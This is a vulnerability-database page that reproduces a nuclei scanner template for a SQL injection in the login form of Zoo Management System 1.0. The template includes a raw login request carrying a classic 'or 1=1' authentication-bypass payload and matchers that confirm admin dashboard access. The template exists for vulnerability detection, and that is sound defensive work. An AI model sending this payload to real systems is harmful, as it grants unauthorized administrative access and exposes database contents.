Lucene search
+L

Zoo Management System 1.0 - SQL Injection

🗓️ 27 Sep 2026 02:09:04Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 57 Views

Zoo Management System 1.0 SQL injection via login username allows access and modification by admin.

Related
Refs
Code
id: CVE-2025-7160

info:
  name: Zoo Management System 1.0 - SQL Injection
  author: arafatansari
  severity: critical
  description: |
    Zoo Management System 1.0 contains a SQL injection vulnerability via the username parameter on the login page. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Unauthenticated attackers can bypass authentication and execute arbitrary SQL queries through the username parameter, potentially gaining full administrative access and extracting sensitive database information.
  remediation: |
    Upgrade Zoo Management System to a patched version that properly sanitizes user input in the login form.
  reference:
    - https://www.exploit-db.com/exploits/48880
    - https://packetstormsecurity.com/files/167572/Zoo-Management-System-1.0-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2025-7160
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-7160
    epss-score: 0.01776
    epss-percentile: 0.77311
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,edb,packetstorm,zms,sqli,auth-bypass,cms,vuln

http:
  - raw:
      - |
        POST /admin/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin%27+or+%271%27%3D%271&password=any&login=

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'ZMS ADMIN'
          - 'Dashboard'
          - 'Zoo Management System'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008aaf35610d9bb00ecb0542b0547c65c3856753733b3759116d333452bdd80e5302205c73fb00859269338cb32566e677367cee6e8835c580e2d4929415697130a5b8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.17.3 - 9.8
CVSS 46.9
CVSS 37.3
CVSS 27.5
EPSS0.01776
SSVC
57